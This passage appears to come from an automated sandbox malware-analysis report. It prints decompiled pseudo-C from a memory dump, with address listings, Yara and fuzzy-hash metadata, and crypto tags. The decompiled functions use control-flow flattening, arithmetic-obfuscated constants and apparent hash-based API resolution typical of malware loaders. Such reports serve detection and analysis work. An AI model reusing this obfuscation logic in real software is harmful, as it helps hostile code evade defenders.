				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				void* _t324;
				void* _t326;
				void* _t335;
				void* _t341;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				void* _t359;
				intOrPtr* _t386;
				void* _t390;
				signed int* _t391;

				_t391 =  &_v156;
				_t386 = __ecx;
				_v4 = __ecx;
				_v112 = 0x5b74b2;
				_v112 = _v112 + 0xffffa8c5;
				_v112 = _v112 << 1;
				_v112 = _v112 ^ 0x00b63aee;
				_v72 = 0x5e5157;
				_t10 =  &_v72; // 0x5e5157
				_v72 =  *_t10 * 0x62;
				_v72 = _v72 ^ 0x241b234e;
				_t390 = 0;
				_v32 = 0x9f59f7;
				_t341 = 0x7e7d422;
				_v32 = _v32 | 0x5adc4522;
				_v32 = _v32 ^ 0x5adf5df7;
				_v144 = 0x461985;
				_v144 = _v144 >> 6;
				_v144 = _v144 + 0x92eb;
				_v144 = _v144 | 0xd7bd3f47;
				_v144 = _v144 ^ 0xd7bdbf57;
				_v88 = 0xa8b3ee;
				_v88 = _v88 + 0x9e6e;
				_v88 = _v88 + 0xffff2941;
				_v88 = _v88 ^ 0x00a87b9d;
				_v48 = 0x4a7f3d;
				_t344 = 0x72;
				_v48 = _v48 / _t344;
				_v48 = _v48 ^ 0x0001f5e4;
				_v92 = 0x998e5d;
				_v92 = _v92 + 0xe0f3;
				_t345 = 0x12;
				_v92 = _v92 / _t345;
				_v92 = _v92 ^ 0x0009a864;
				_v148 = 0xa04ccc;
				_v148 = _v148 >> 4;
				_t346 = 0xd;
				_v148 = _v148 / _t346;
				_t347 = 0x62;
				_v148 = _v148 / _t347;
				_v148 = _v148 ^ 0x000d2b48;
				_v100 = 0x49f295;
				_v100 = _v100 | 0x20544f2c;
				_t75 =  &_v100; // 0x20544f2c
				_t348 = 0x11;
				_v100 =  *_t75 / _t348;
				_v100 = _v100 ^ 0x01e64bb6;
				_v140 = 0x446fdd;
				_v140 = _v140 + 0xc41;
				_v140 = _v140 ^ 0x4f39ba92;
				_v140 = _v140 + 0x26b0;
				_v140 = _v140 ^ 0x4f73f21e;
				_v24 = 0xbca556;
				_v24 = _v24 ^ 0x6e40869f;
				_v24 = _v24 ^ 0x6ef14e65;
				_v40 = 0x7e8551;
				_v40 = _v40 * 0x41;
				_v40 = _v40 ^ 0x201ae365;
				_v104 = 0x8bf2e8;
				_v104 = _v104 | 0x0c3002af;
				_t349 = 0x2c;
				_v104 = _v104 * 0x67;
				_v104 = _v104 ^ 0x1f9920ce;
				_v116 = 0xc81b9b;
				_v116 = _v116 * 0x18;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 ^ 0x0003e30f;
				_v44 = 0xd37f22;
				_v44 = _v44 ^ 0x2e1471af;
				_v44 = _v44 ^ 0x2ec8d05d;
				_v52 = 0xc8d41d;
				_v52 = _v52 * 0x4f;
				_v52 = _v52 ^ 0x3df5adc6;
				_v60 = 0xb8beac;
				_v60 = _v60 >> 4;
				_v60 = _v60 ^ 0x000f9eca;
				_v68 = 0x269fbd;
				_v68 = _v68 >> 0xb;
				_v68 = _v68 ^ 0x00041e96;
				_v36 = 0x8cfac0;
				_v36 = _v36 | 0xf628ff53;
				_v36 = _v36 ^ 0xf6a5a5de;
				_v96 = 0xce5c3b;
				_v96 = _v96 | 0xe6236d23;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 ^ 0x0032ff20;
				_v124 = 0x412f8f;
				_v124 = _v124 ^ 0x2ae7f4e1;
				_v124 = _v124 << 6;
				_v124 = _v124 | 0xc9b912e1;
				_v124 = _v124 ^ 0xe9b5ce4c;
				_v132 = 0x7f023e;
				_v132 = _v132 ^ 0xa02a8a09;
				_v132 = _v132 * 9;
				_v132 = _v132 + 0xb80;
				_v132 = _v132 ^ 0xa301fd04;
				_v64 = 0x2390e7;
				_v64 = _v64 | 0x07282702;
				_v64 = _v64 ^ 0x072a7736;
				_v12 = 0x4ed310;
				_v12 = _v12 ^ 0xa26db4f7;
				_v12 = _v12 ^ 0xa2294a47;
				_v56 = 0x4be76e;
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0x0007bf8e;
				_v76 = 0x1407ea;
				_v76 = _v76 + 0x9c75;
				_v76 = _v76 ^ 0x0016a469;
				_v84 = 0x3b88d1;
				_v84 = _v84 >> 0xc;
				_v84 = _v84 ^ 0x72810e5c;
				_v84 = _v84 ^ 0x7286a24d;
				_v136 = 0xbd4d16;
				_v136 = _v136 + 0xffffbc79;
				_v136 = _v136 + 0xffff4819;
				_v136 = _v136 << 0xf;
				_v136 = _v136 ^ 0x28d68651;
				_v152 = 0xda1d4a;
				_v152 = _v152 | 0x9c85dfe3;
				_v152 = _v152 + 0xffffd974;
				_v152 = _v152 + 0x8244;
				_v152 = _v152 ^ 0x9cec8bb1;
				_v80 = 0xfd3fc2;
				_v80 = _v80 / _t349;
				_v80 = _v80 + 0xffff2aa9;
				_v80 = _v80 ^ 0x0000fb37;
				_v16 = 0x9425a6;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00247dad;
				_v156 = 0x6d219a;
				_v156 = _v156 | 0xffeffff5;
				_v156 = _v156 ^ 0xffeff45b;
				_v128 = 0x965e44;
				_v128 = _v128 + 0xe806;
				_v128 = _v128 * 0x4f;
				_v128 = _v128 ^ 0xa8e25781;
				_v128 = _v128 ^ 0x86408e31;
				_v108 = 0x6d7dbb;
				_v108 = _v108 + 0xffffc4a3;
				_v108 = _v108 | 0xcce549e6;
				_v108 = _v108 ^ 0xccefa603;
				_v120 = 0x16cc41;
				_v120 = _v120 | 0xde7fffee;
				_v120 = _v120 ^ 0xde7d4f99;
				_v20 = 0xa31c76;
				_v20 = _v20 + 0xffff22cd;
				_v20 = _v20 ^ 0x00a6a38f;
				_v28 = 0x8afd7c;
				_v28 = _v28 | 0xf31dc3e8;
				_v28 = _v28 ^ 0xf3972035;
				while(1) {
					L1:
					_t324 = 0xd21895a;
					do {
						while(_t341 != 0x4cec912) {
							if(_t341 == 0x7e7d422) {
								_t341 = 0x907b137;
								continue;
							} else {
								if(_t341 == 0x907b137) {
									_push(_v148);
									_push(_v92);
									_t326 = E0122CD35(0x1211380, _v48, __eflags);
									_push(_v24);
									_push(_v140);
									__eflags = E0122D96C(_v40, _v104,  &_v8, _v112, _v116, E0122CD35(0x1211250, _v100, __eflags), _t326) - _v72;
									_t341 =  ==  ? 0xd21895a : 0xe98e6d2;
									E0122629F(_v44, _t326, _v52, _v60, _v68);
									E0122629F(_v36, _t327, _v96, _v124, _v132);
									_t386 = _v4;
									_t391 =  &(_t391[0xf]);
									L10:
									_t324 = 0xd21895a;
								} else {
									_t396 = _t341 - _t324;
									if(_t341 == _t324) {
										_push(_v56);
										_push(_v12);
										_t335 = E0122CD35(0x12112a0, _v64, _t396);
										_pop(_t359);
										_t267 =  &_v152; // 0xd2b48
										E01229F1C(_v76,  *_t386, _t359,  *((intOrPtr*)(_t386 + 4)), _v84, _v8, _v32, _v136, _t335,  *_t267, _v80,  *0x1235220 + 0x54);
										_t341 = 0x4cec912;
										_t390 =  ==  ? 1 : _t390;
										E0122629F(_v16, _t335, _v156, _v128, _v108);
										_t391 =  &(_t391[0xd]);
										goto L1;
									}
								}
							}
							goto L11;
						}
						E01224827(_v8, _v120, _v88, _v20, _v28);
						_t391 =  &(_t391[3]);
						_t341 = 0xe98e6d2;
						goto L10;
						L11:
						__eflags = _t341 - 0xe98e6d2;
					} while (__eflags != 0);
					return _t390;
				}
			}
























































                          0x0122ce90
                          0x0122ce9a
                          0x0122ce9c
                          0x0122cea3
                          0x0122cead
                          0x0122ceb5
                          0x0122ceb9
                          0x0122cec1
                          0x0122cec9
                          0x0122cece
                          0x0122ced2
                          0x0122ceda
                          0x0122cedc
                          0x0122cee7
                          0x0122ceec
                          0x0122cef7
                          0x0122cf02
                          0x0122cf0a
                          0x0122cf0f
                          0x0122cf17
                          0x0122cf1f
                          0x0122cf27
                          0x0122cf2f
                          0x0122cf37
                          0x0122cf3f
                          0x0122cf47
                          0x0122cf55
                          0x0122cf5a
                          0x0122cf63
                          0x0122cf6e
                          0x0122cf76
                          0x0122cf82
                          0x0122cf87
                          0x0122cf8d
                          0x0122cf95
                          0x0122cf9d
                          0x0122cfa6
                          0x0122cfab
                          0x0122cfb5
                          0x0122cfba
                          0x0122cfc0
                          0x0122cfc8
                          0x0122cfd0
                          0x0122cfd8
                          0x0122cfdc
                          0x0122cfdf
                          0x0122cfe3
                          0x0122cfeb
                          0x0122cff3
                          0x0122cffb
                          0x0122d003
                          0x0122d00b
                          0x0122d013
                          0x0122d01e
                          0x0122d029
                          0x0122d034
                          0x0122d047
                          0x0122d04e
                          0x0122d059
                          0x0122d063
                          0x0122d072
                          0x0122d073
                          0x0122d077
                          0x0122d07f
                          0x0122d08c
                          0x0122d090
                          0x0122d095
                          0x0122d09d
                          0x0122d0a8
                          0x0122d0b3
                          0x0122d0be
                          0x0122d0cb
                          0x0122d0cf
                          0x0122d0d7
                          0x0122d0df
                          0x0122d0e4
                          0x0122d0ec
                          0x0122d0f4
                          0x0122d0f9
                          0x0122d101
                          0x0122d10c
                          0x0122d117
                          0x0122d122
                          0x0122d12a
                          0x0122d132
                          0x0122d137
                          0x0122d13f
                          0x0122d147
                          0x0122d14f
                          0x0122d154
                          0x0122d15c
                          0x0122d164
                          0x0122d16c
                          0x0122d179
                          0x0122d17d
                          0x0122d185
                          0x0122d18d
                          0x0122d195
                          0x0122d19d
                          0x0122d1a5
                          0x0122d1b0
                          0x0122d1bb
                          0x0122d1c6
                          0x0122d1ce
                          0x0122d1d3
                          0x0122d1db
                          0x0122d1e3
                          0x0122d1eb
                          0x0122d1f3
                          0x0122d1fb
                          0x0122d200
                          0x0122d208
                          0x0122d210
                          0x0122d218
                          0x0122d220
                          0x0122d228
                          0x0122d22d
                          0x0122d235
                          0x0122d23d
                          0x0122d245
                          0x0122d24d
                          0x0122d255
                          0x0122d25d
                          0x0122d26b
                          0x0122d26f
                          0x0122d277
                          0x0122d27f
                          0x0122d28a
                          0x0122d292
                          0x0122d29d
                          0x0122d2a5
                          0x0122d2ad
                          0x0122d2b5
                          0x0122d2bd
                          0x0122d2ca
                          0x0122d2ce
                          0x0122d2d6
                          0x0122d2de
                          0x0122d2e6
                          0x0122d2ee
                          0x0122d2f6
                          0x0122d2fe
                          0x0122d306
                          0x0122d30e
                          0x0122d316
                          0x0122d321
                          0x0122d32c
                          0x0122d337
                          0x0122d342
                          0x0122d34d
                          0x0122d358
                          0x0122d358
                          0x0122d358
                          0x0122d35d
                          0x0122d35d
                          0x0122d36f
                          0x0122d4d1
                          0x00000000
                          0x0122d375
                          0x0122d37b
                          0x0122d415
                          0x0122d41e
                          0x0122d429
                          0x0122d42e
                          0x0122d43c
                          0x0122d484
                          0x0122d492
                          0x0122d4a3
                          0x0122d4c0
                          0x0122d4c5
                          0x0122d4cc
                          0x0122d505
                          0x0122d505
                          0x0122d381
                          0x0122d381
                          0x0122d383
                          0x0122d389
                          0x0122d392
                          0x0122d39d
                          0x0122d3a3
                          0x0122d3b3
                          0x0122d3db
                          0x0122d3ef
                          0x0122d3f8
                          0x0122d408
                          0x0122d40d
                          0x00000000
                          0x0122d40d
                          0x0122d383
                          0x0122d37b
                          0x00000000
                          0x0122d36f
                          0x0122d4f8
                          0x0122d4fd
                          0x0122d500
                          0x00000000
                          0x0122d50a
                          0x0122d50a
                          0x0122d50a
                          0x0122d522
                          0x0122d522

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ,OT $H+$H+$WQ^$nK
                          • API String ID: 0-4252230371
                          • Opcode ID: 63818bd78c8bb77b16e7c512d8823246d7cbcca82e6214144e946fc27fff9b47
                          • Instruction ID: 23ed94791adb56d8e26315aa8f85c813f8b95712d484bd3f6e541961029c715f
                          • Opcode Fuzzy Hash: 63818bd78c8bb77b16e7c512d8823246d7cbcca82e6214144e946fc27fff9b47
                          • Instruction Fuzzy Hash: 58F120711183819FD3A8CF65C58AA4FFBE2BBC5708F10891DE2DA86260D7B58919CF03
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0121A3E7, Relevance: 6.5, Strings: 5, Instructions: 257COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 89%
                          			E0121A3E7(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr* _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				void* _t249;
				intOrPtr _t252;
				void* _t255;
				intOrPtr _t264;
				intOrPtr _t268;
				intOrPtr* _t269;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				void* _t312;
				intOrPtr _t315;
				signed int* _t316;

				_t269 = __ecx;
				_t316 =  &_v220;
				_v168 = __ecx;
				_v144 = 0xd84507;
				_v144 = _v144 * 0x70;
				_t312 = 0x4fa9762;
				_v144 = _v144 ^ 0x5e9f127d;
				_v204 = 0xa7c13a;
				_v204 = _v204 + 0x1c61;
				_v204 = _v204 + 0xa5c;
				_v204 = _v204 | 0xf998f1bf;
				_v204 = _v204 ^ 0xf9be8168;
				_v164 = 0x3b6d58;
				_v164 = _v164 ^ 0xfbc1946a;
				_v164 = _v164 | 0xf113f9e6;
				_v164 = _v164 ^ 0xfbf9ede1;
				_v172 = 0xfed325;
				_v172 = _v172 ^ 0xf8019550;
				_v172 = _v172 ^ 0x5b4b4b1d;
				_v172 = _v172 ^ 0xa3befe51;
				_v196 = 0xbb5ff;
				_v196 = _v196 >> 9;
				_v196 = _v196 | 0xc4a93077;
				_t303 = 0x17;
				_v196 = _v196 * 0x45;
				_v196 = _v196 ^ 0x0196fdaa;
				_v156 = 0x8c85b8;
				_v156 = _v156 * 0x2b;
				_v156 = _v156 / _t303;
				_v156 = _v156 ^ 0x010b3f45;
				_v176 = 0x6b6a3d;
				_t51 =  &_v176; // 0x6b6a3d
				_t304 = 0x5b;
				_v176 =  *_t51 * 0x11;
				_v176 = _v176 >> 0xa;
				_v176 = _v176 ^ 0x0002f1d5;
				_v184 = 0xed332f;
				_v184 = _v184 << 1;
				_v184 = _v184 ^ 0x63d4c41d;
				_v184 = _v184 ^ 0xc6cebfb4;
				_v184 = _v184 ^ 0xa4c6275a;
				_v216 = 0xd9da9d;
				_v216 = _v216 / _t304;
				_v216 = _v216 | 0xfe4ffeff;
				_v216 = _v216 ^ 0xfe47cdfb;
				_v132 = 0x4c89ab;
				_v132 = _v132 | 0x8e16addf;
				_v132 = _v132 ^ 0x8e538111;
				_v208 = 0x321d72;
				_v208 = _v208 >> 2;
				_t305 = 0x2c;
				_v208 = _v208 * 0x23;
				_v208 = _v208 | 0xcdc94613;
				_v208 = _v208 ^ 0xcdff5cd9;
				_v152 = 0x2474c6;
				_v152 = _v152 << 6;
				_v152 = _v152 ^ 0x09159949;
				_v136 = 0x7ed832;
				_v136 = _v136 | 0xd6374e51;
				_v136 = _v136 ^ 0xd6756049;
				_v220 = 0x876b48;
				_v220 = _v220 + 0x5e6b;
				_v220 = _v220 << 3;
				_v220 = _v220 / _t305;
				_v220 = _v220 ^ 0x001eed09;
				_v200 = 0x23fe39;
				_t306 = 0x49;
				_v200 = _v200 / _t306;
				_v200 = _v200 + 0xffff2e11;
				_v200 = _v200 ^ 0xb5864ef7;
				_v200 = _v200 ^ 0x4a75c81d;
				_v192 = 0x3d150f;
				_t307 = 0x6a;
				_t315 = _v168;
				_t268 = _v168;
				_v192 = _v192 * 0x42;
				_v192 = _v192 / _t307;
				_t308 = 0x3c;
				_v192 = _v192 / _t308;
				_v192 = _v192 ^ 0x00064e10;
				_v148 = 0xcb5853;
				_t309 = 0x26;
				_v148 = _v148 / _t309;
				_v148 = _v148 ^ 0x0004e9ac;
				_v212 = 0xb5941e;
				_v212 = _v212 + 0x1842;
				_t310 = 0x5a;
				_t311 = _v168;
				_v212 = _v212 / _t310;
				_v212 = _v212 + 0xffffdacb;
				_v212 = _v212 ^ 0x0007c3f3;
				_v140 = 0xa68c6f;
				_v140 = _v140 | 0x83d01b36;
				_v140 = _v140 ^ 0x83f08dca;
				_v160 = 0xdc12f0;
				_v160 = _v160 << 5;
				_v160 = _v160 ^ 0x44094ed3;
				_v160 = _v160 ^ 0x5f840a03;
				_v180 = 0x5d0f5d;
				_v180 = _v180 >> 0xd;
				_v180 = _v180 + 0xffff8880;
				_v180 = _v180 >> 9;
				_v180 = _v180 ^ 0x00707445;
				_v188 = 0x7f5d3;
				_v188 = _v188 + 0x22f2;
				_v188 = _v188 >> 0x10;
				_v188 = _v188 >> 9;
				_v188 = _v188 ^ 0x0008d1e0;
				while(1) {
					L1:
					_t249 = 0x6b77e87;
					do {
						while(_t312 != 0x3ca6ab2) {
							if(_t312 == 0x4fa9762) {
								_t312 = 0x3ca6ab2;
								continue;
							} else {
								if(_t312 == _t249) {
									_push(_v192);
									_push(_v200);
									_t255 = E0122CD35(0x121166c, _v220, __eflags);
									_push(_t311);
									_push( &_v128);
									_push(_t255);
									_push(_t315);
									_push(_t268);
									 *((intOrPtr*)(E01217DE3(_t273, 0xa92f64b6, 0x185)))();
									E0122629F(_v148, _t255, _v212, _v140, _v160);
									_t316 =  &(_t316[8]);
									_t312 = 0xbd056ba;
									goto L10;
								} else {
									if(_t312 == 0x8461c53) {
										_t315 = 0x4000;
										_push(_t269);
										_push(_t269);
										_t264 = E01225212(0x4000);
										_t269 = _v168;
										_t268 = _t264;
										_t316 =  &(_t316[3]);
										__eflags = _t268;
										_t249 = 0x6b77e87;
										_t312 =  !=  ? 0x6b77e87 : 0xbd056ba;
										continue;
									} else {
										if(_t312 == 0xbd056ba) {
											E0121AE43(_t311, _v180, _v188);
										} else {
											if(_t312 != 0xc24c83e) {
												goto L15;
											} else {
												_t200 =  &_v184; // 0x707445
												_t311 = E0121BD61(_v156, _v176,  *((intOrPtr*)(_t269 + 4)),  *_t269,  *_t200, _v216);
												_t316 =  &(_t316[4]);
												if(_t311 != 0) {
													_t312 = 0x8461c53;
													L10:
													_t269 = _v168;
													goto L1;
												}
											}
										}
									}
								}
							}
							L18:
							return _t268;
						}
						__eflags = 1;
						_push(_t269);
						_t252 = E01212C02(1, 0x10);
						_push(_v196);
						_t315 = _t252;
						_push( &_v128);
						_push(0xb);
						_push(_v172);
						E01214A97(_t315, _v164);
						_t269 = _v168;
						_t316 =  &(_t316[6]);
						_t312 = 0xc24c83e;
						_t249 = 0x6b77e87;
						L15:
						__eflags = _t312 - 0x8c9e984;
					} while (__eflags != 0);
					goto L18;
				}
			}













































                          0x0121a3e7
                          0x0121a3e7
                          0x0121a3f1
                          0x0121a3f5
                          0x0121a404
                          0x0121a408
                          0x0121a40d
                          0x0121a415
                          0x0121a41d
                          0x0121a425
                          0x0121a42d
                          0x0121a435
                          0x0121a43d
                          0x0121a445
                          0x0121a44d
                          0x0121a455
                          0x0121a45d
                          0x0121a465
                          0x0121a46d
                          0x0121a475
                          0x0121a47d
                          0x0121a485
                          0x0121a48a
                          0x0121a499
                          0x0121a49c
                          0x0121a4a0
                          0x0121a4a8
                          0x0121a4b5
                          0x0121a4c1
                          0x0121a4c5
                          0x0121a4cd
                          0x0121a4d5
                          0x0121a4da
                          0x0121a4dd
                          0x0121a4e1
                          0x0121a4e6
                          0x0121a4ee
                          0x0121a4f6
                          0x0121a4fa
                          0x0121a502
                          0x0121a50a
                          0x0121a512
                          0x0121a522
                          0x0121a526
                          0x0121a52e
                          0x0121a536
                          0x0121a53e
                          0x0121a546
                          0x0121a54e
                          0x0121a556
                          0x0121a560
                          0x0121a561
                          0x0121a565
                          0x0121a56d
                          0x0121a575
                          0x0121a57d
                          0x0121a582
                          0x0121a58a
                          0x0121a592
                          0x0121a59a
                          0x0121a5a2
                          0x0121a5aa
                          0x0121a5b2
                          0x0121a5bd
                          0x0121a5c3
                          0x0121a5cb
                          0x0121a5d9
                          0x0121a5de
                          0x0121a5e4
                          0x0121a5ec
                          0x0121a5f4
                          0x0121a5fc
                          0x0121a609
                          0x0121a60c
                          0x0121a610
                          0x0121a614
                          0x0121a620
                          0x0121a628
                          0x0121a62d
                          0x0121a633
                          0x0121a63b
                          0x0121a647
                          0x0121a64c
                          0x0121a652
                          0x0121a65a
                          0x0121a662
                          0x0121a66e
                          0x0121a671
                          0x0121a675
                          0x0121a679
                          0x0121a681
                          0x0121a689
                          0x0121a691
                          0x0121a699
                          0x0121a6a1
                          0x0121a6a9
                          0x0121a6ae
                          0x0121a6b6
                          0x0121a6be
                          0x0121a6c6
                          0x0121a6cb
                          0x0121a6d3
                          0x0121a6d8
                          0x0121a6e0
                          0x0121a6e8
                          0x0121a6f0
                          0x0121a6f5
                          0x0121a6fa
                          0x0121a702
                          0x0121a702
                          0x0121a702
                          0x0121a707
                          0x0121a707
                          0x0121a719
                          0x0121a80c
                          0x00000000
                          0x0121a71f
                          0x0121a721
                          0x0121a7b3
                          0x0121a7bc
                          0x0121a7c4
                          0x0121a7cb
                          0x0121a7d7
                          0x0121a7d8
                          0x0121a7d9
                          0x0121a7da
                          0x0121a7e6
                          0x0121a7fa
                          0x0121a7ff
                          0x0121a802
                          0x00000000
                          0x0121a727
                          0x0121a72d
                          0x0121a77d
                          0x0121a78e
                          0x0121a78f
                          0x0121a791
                          0x0121a796
                          0x0121a79a
                          0x0121a79c
                          0x0121a7a4
                          0x0121a7a6
                          0x0121a7ab
                          0x00000000
                          0x0121a72f
                          0x0121a735
                          0x0121a86e
                          0x0121a73b
                          0x0121a741
                          0x00000000
                          0x0121a747
                          0x0121a74b
                          0x0121a761
                          0x0121a763
                          0x0121a768
                          0x0121a76e
                          0x0121a773
                          0x0121a773
                          0x00000000
                          0x0121a773
                          0x0121a768
                          0x0121a741
                          0x0121a735
                          0x0121a72d
                          0x0121a721
                          0x0121a877
                          0x0121a880
                          0x0121a880
                          0x0121a820
                          0x0121a821
                          0x0121a824
                          0x0121a829
                          0x0121a82d
                          0x0121a833
                          0x0121a834
                          0x0121a836
                          0x0121a840
                          0x0121a845
                          0x0121a849
                          0x0121a84c
                          0x0121a851
                          0x0121a856
                          0x0121a856
                          0x0121a856
                          0x00000000
                          0x0121a862

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: =jk$Etp$Xm;$\$k^
                          • API String ID: 0-1272230326
                          • Opcode ID: 4c16ed0e900cdb5a306045415894f010d306671da5e567d13351867b3e6afba5
                          • Instruction ID: b83e2ce91a4d27e981f11b189992bc2796ace2ebbdbb104857298909dda8934e
                          • Opcode Fuzzy Hash: 4c16ed0e900cdb5a306045415894f010d306671da5e567d13351867b3e6afba5
                          • Instruction Fuzzy Hash: 44C151715183819FD358CF69C48A91BFBE1FBD4358F108A2DF9A686260D3B5C94ACF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0121544C, Relevance: 6.5, Strings: 5, Instructions: 245COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E0121544C(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t244;
				void* _t263;
				intOrPtr _t271;
				void* _t273;
				intOrPtr* _t275;
				void* _t277;
				void* _t298;
				intOrPtr* _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				void* _t308;
				void* _t309;

				_t275 = _a12;
				_push(_t275);
				_push(_a8);
				_t300 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0121358A(_t244);
				_v36 = 0xdc2bcb;
				_t309 = _t308 + 0x14;
				_v36 = _v36 + 0x536c;
				_v36 = _v36 ^ 0x00dc7f36;
				_t298 = 0;
				_v88 = 0x1c73f3;
				_t277 = 0x150e76b;
				_t301 = 0x58;
				_v88 = _v88 / _t301;
				_v88 = _v88 | 0x7f753ffe;
				_v88 = _v88 ^ 0x7f757ffe;
				_v64 = 0x374fb2;
				_t302 = 0x4f;
				_v64 = _v64 / _t302;
				_v64 = _v64 + 0xadcb;
				_v64 = _v64 ^ 0x00016107;
				_v72 = 0x71f7ec;
				_v72 = _v72 >> 7;
				_v72 = _v72 << 2;
				_v72 = _v72 ^ 0x00038fbc;
				_v28 = 0x592ffc;
				_v28 = _v28 | 0x6bdc89c5;
				_v28 = _v28 ^ 0x6bddaffd;
				_v84 = 0x8a5820;
				_v84 = _v84 << 0xb;
				_t303 = 6;
				_v84 = _v84 * 0x6f;
				_v84 = _v84 >> 0xe;
				_v84 = _v84 ^ 0x000386bc;
				_v12 = 0xa9e741;
				_v12 = _v12 + 0x6f3b;
				_v12 = _v12 ^ 0x00aa567c;
				_v100 = 0x6c7d8d;
				_v100 = _v100 ^ 0x675748fb;
				_v100 = _v100 / _t303;
				_v100 = _v100 >> 9;
				_v100 = _v100 ^ 0x000219b4;
				_v60 = 0x2262da;
				_v60 = _v60 | 0x0807b7ac;
				_v60 = _v60 ^ 0x496315a5;
				_v60 = _v60 ^ 0x41454186;
				_v104 = 0xbed500;
				_v104 = _v104 + 0xde03;
				_v104 = _v104 + 0x2fdf;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x000bb7de;
				_v32 = 0x715e1e;
				_v32 = _v32 | 0x73b11108;
				_v32 = _v32 ^ 0x73fcfaa1;
				_v68 = 0x83a372;
				_v68 = _v68 >> 4;
				_v68 = _v68 | 0xb7f01704;
				_v68 = _v68 ^ 0xb7f9ca93;
				_v108 = 0x4b5c53;
				_v108 = _v108 << 0xd;
				_v108 = _v108 + 0xbfd6;
				_v108 = _v108 | 0xd24a98ab;
				_v108 = _v108 ^ 0xfbcc634c;
				_v24 = 0xdad6c6;
				_t304 = 0x38;
				_v24 = _v24 / _t304;
				_v24 = _v24 ^ 0x000d4cce;
				_v52 = 0xf34fea;
				_v52 = _v52 ^ 0x0965af87;
				_v52 = _v52 + 0xffffee3a;
				_v52 = _v52 ^ 0x0993a66a;
				_v56 = 0x5126e0;
				_v56 = _v56 << 4;
				_t305 = 0x24;
				_v56 = _v56 * 0x5b;
				_v56 = _v56 ^ 0xcd84b63b;
				_v96 = 0xa97a98;
				_v96 = _v96 >> 2;
				_v96 = _v96 ^ 0xfedf87fe;
				_v96 = _v96 ^ 0xf15aa456;
				_v96 = _v96 ^ 0x0fa410ba;
				_v16 = 0x301ef9;
				_v16 = _v16 / _t305;
				_v16 = _v16 ^ 0x000f2a66;
				_v80 = 0xba5fe3;
				_t306 = 0x4b;
				_v80 = _v80 * 0x7a;
				_v80 = _v80 + 0xffff00e9;
				_v80 = _v80 >> 0xd;
				_v80 = _v80 ^ 0x000b7def;
				_v20 = 0x56787d;
				_v20 = _v20 + 0xfffff4a0;
				_v20 = _v20 ^ 0x005a7884;
				_v44 = 0x1443f4;
				_v44 = _v44 / _t306;
				_v44 = _v44 + 0x5792;
				_v44 = _v44 ^ 0x000e9e3f;
				_v48 = 0x4a21a2;
				_v48 = _v48 >> 4;
				_v48 = _v48 ^ 0x6683f774;
				_v48 = _v48 ^ 0x66830a3b;
				_v92 = 0x1b1e81;
				_v92 = _v92 ^ 0xc1b2560b;
				_v92 = _v92 + 0xbb04;
				_v92 = _v92 << 9;
				_v92 = _v92 ^ 0x5408c7e4;
				_v76 = 0x95c882;
				_v76 = _v76 << 0xf;
				_v76 = _v76 * 0x58;
				_v76 = _v76 << 6;
				_v76 = _v76 ^ 0x9606a67d;
				_v40 = 0x7abc9b;
				_v40 = _v40 ^ 0xf5a57a11;
				_v40 = _v40 | 0x139c0c13;
				_v40 = _v40 ^ 0xf7daa019;
				do {
					while(_t277 != 0x150e76b) {
						if(_t277 == 0x5cf5989) {
							_t263 = E012162D2( &_v4, _v16, _v8, _v80, _v84, _v20, _v44, _v48, _t277,  *_t300, _v88, _v4, _t277,  *((intOrPtr*)(_t300 + 4)),  *((intOrPtr*)( *0x1235220 + 0x44)), _v92);
							_t309 = _t309 + 0x38;
							if(_t263 == _v12) {
								 *_t275 = _v8;
								_t298 = 1;
								 *((intOrPtr*)(_t275 + 4)) = _v4;
							} else {
								_t277 = 0xb0e3219;
								continue;
							}
						} else {
							if(_t277 == 0x7dcf113) {
								_push(_t277);
								_push(_t277);
								_t271 = E01225212(_v4);
								_t309 = _t309 + 0xc;
